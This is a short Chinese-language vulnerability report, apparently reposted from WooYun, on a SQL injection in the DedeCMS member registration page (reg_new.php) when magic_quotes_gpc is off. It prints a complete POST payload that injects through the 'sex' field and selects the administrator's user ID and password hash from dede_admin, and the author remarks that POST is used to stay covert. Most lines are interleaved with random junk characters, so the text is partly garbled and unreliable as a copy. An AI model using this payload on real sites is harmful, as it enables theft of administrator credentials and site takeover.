漏洞类型: SQL注射漏洞
( J4 ^, a* Z+ h简要描述:
4 O" t9 h! |* B/ U1 x
+ g" j( e8 A( v$ J' c, l; G ?3 D( [需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.! Q' E( j+ F2 R, d' I! ?: x2 M2 f
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
@, K4 u! Y7 q% ?2 c6 l* l详细说明:跟这个漏洞
! x- x* f7 X" b, ?1 d& h! G F
) a: l8 M. V5 s2 q4 gWooYun: Dedecms SQL注射导致审核机制绕过漏洞
$ V8 u- [& B7 ^! e- D2 |6 x是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
0 Z/ t, i' o5 G1 E: qPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
+ }( V6 ] _0 g: Q7 E/ j0 M
% k( e: @; n" ywww.political-security.com/member/reg_new.php5 g \8 l1 q0 S3 G
$ X0 ]( P- O6 O) G1 ?. _' `& KPOST
4 y. s! A- b8 Y8 v8 \- E
& a" l S3 U8 o6 x3 c6 t! Kdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
" t M( h8 A h' x4 k# H$ A- iuserid=c4rp3nt3r&uname=c4rp3nt3r
* r7 P+ V0 o+ F&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss+ S$ U3 a, R5 I* t' e
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
G% `1 G9 F9 O1 D2 p) |" r1 y(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,''); @: }" f7 c0 f+ d4 O! n& {# C
%00&vdcode=glos&agree= |